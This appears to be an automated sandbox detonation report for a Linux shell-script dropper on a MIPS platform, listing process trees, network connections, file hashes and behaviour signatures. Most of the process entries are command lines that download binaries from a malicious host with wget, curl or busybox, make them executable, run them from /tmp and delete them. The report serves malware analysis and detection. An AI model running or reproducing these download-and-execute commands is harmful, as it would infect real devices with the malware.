[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/rm
[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/chmod
[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/rm
[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/chmod
[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/rm
[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/chmod
[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/rm
[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/chmod
[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/rm
[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/chmod
[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/rm
[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/chmod
[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/rm
[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/chmod
[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/rm
[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/chmod
[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/rm
[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 08:31
Reported
2024-11-21 08:33
Platform
debian9-mipsel-20240418-en
Max time kernel
69s
Max time network
71s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | N/A |
| N/A | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
| N/A | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | N/A |
| N/A | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
Processes
/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
[/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/chmod
[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
